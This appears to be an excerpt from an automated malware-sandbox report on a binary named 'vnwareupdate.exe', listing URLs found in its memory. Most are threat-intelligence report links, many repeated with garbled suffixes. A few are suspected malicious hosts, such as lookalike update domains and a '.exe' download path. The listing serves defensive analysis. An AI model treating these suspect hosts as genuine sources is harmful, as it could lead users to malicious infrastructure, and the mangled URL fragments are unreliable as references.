Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/blog/research/68083/cloud-atlas-redoctober-a
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/blog/research/68083/cloud-atlas-redoctober-aCloud
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/blog/research/68083/cloud-atlas-redoctober-aSyrian
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/files/2015/02/Carbanak_APT_eng.pdf0b7613e0f739eb63fd5ed9e99934d54a38e56c558ab8
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://securelist.com/files/2015/02/Carbanak_APT_eng.pdfCarbanak
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://securityblog.s21sec.com/2015/03/new-banker-slave-hitting-polish-banks.htm
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-fo
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-foNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-foOperation
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-foaNew
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://securitykitten.github.io/lusypos-and-tor/
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://securitykitten.github.io/lusypos-and-tor/EWRaspberry
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://securityxploded.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://securityxploded.com/browser-password-dump.php
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp	String found in binary or memory: http://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mecha
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechaBedep
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechaRawPOS
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://seo.chinaz.com/?host=
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://services.fiveemotions.co.jp
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://snip.ly/giNB
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://snip.ly/giNB8
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://stnmt.bacninh.gov.vn/documents/57412/11672469/420-STTTT.pdf
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: http://surveillance-security-camera.blogspot.co.uk/2017/01/analysis-of-new-shamo
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://t.co/EG0qtVcKLh
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05#
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05#KTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05#qTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05$
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05$TTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05%
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05(
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05)
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05.
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05/
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-050
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-052
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-052/Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-052CTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-053
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-055
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-056
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-057
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-058?Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-059
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-059JTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05=RTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05ARTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05D
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05E
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05G
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05I3Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05K
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05M
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05N
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05O
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05P
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05Q
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05R
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05S
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05T
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05U
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05W
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05X
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05Y
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05Z
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05_
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05a
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05b
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05c
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05d
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05dbTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05dtTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05e
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05f
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05g
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05h
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05i
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05j
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05l
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05m
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05n
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05o
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05p
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05q
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05q0Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05q8Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05r
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05rOTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05rvTrojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05s
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05t
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05u
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05v
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05w
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05x
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05x:Trojan.Linux.Spike.A
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05y
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05z
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20140926-05~
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01APTnotes
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01Archimedes
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01FireCrypt
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01Grabit
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01Skype
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20151008-01Trojan.Win32.Banker.NWT
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://telussecuritylabs.com/threats/show/TSL20160106-02
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://thisissecurity.net/2015/09/30/when-elf-billgates-met-windows/Operation
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://thisissecurity.net/2015/09/30/when-elf-billgates-met-windows/When
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://threatconnect.com/camerashy/?utm_campaign=CameraShy
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://tools.zjqhr.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://update.konamidata.com/test/zl/sophos/td/index.dat?
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://update.upload-dropbox
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://us11.campaign-archive1.com/?u=90e9f2002c4ccb9d8c541acf9&id=27baaa7b7b
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://user.qzone.qq.com/568148075
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: http://ver007.com/tools/APTnotes/2010/Combating%20Threats%20-%20Operation%20Auro
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://ver007.com/tools/APTnotes/2010/Combating%20Threats%20-%20Operation%20AurockCombating
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://ver007.com/tools/APTnotes/2010/Combating%20Threats%20-%20Operation%20AurokCommunities
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://ver007.com/tools/APTnotes/2010/Combating%20Threats%20-%20Operation%20Aurokan
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://winodwsupdates.me
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.0855.tv
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.4ngel.net
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdf
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdf6788313A762C211DCB0DE421607E6057;Desto
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfGauss
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfHancitor
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfIntroducing
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfP
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfPoseidon
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.aftana.ir/images/docs/files/000002/nf00002716-1.pdfuss
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://www.arbornetworks.com/blog/asert/alpha-testing-alphaleon-http-bot/
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://www.avanan.com/resources/attack-on-office-365-corporate-users-with-zero-d
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/ma.exe
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malverNew
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://www.bleepingcomputer.com/news/security/ctb-faker-ransomware-does-a-poor-j
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: http://www.blueliv.com
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: http://www.cert.org.cn/publish/main/10/2017/20170804154348879884398/201708041543
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.cert.pl/PDF/The_Postal_Group.pdf
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-sp
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-sp20Nearly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spMaNearly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spPTNearly
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spWoNearly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spabEthiopian
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spatNearly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spdfNearly
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spfdNearly
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spixNearly
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spoup
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spteNearly
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://www.certego.net/en/news/ruby-rce-used-to-push-monero-coinminer/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.chinesehack.org/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/charmingkitten/
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/charmingkitten/Charming
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/charmingkitten/F220F0A48885BAFC29B31FB7228CC4BB;Bots
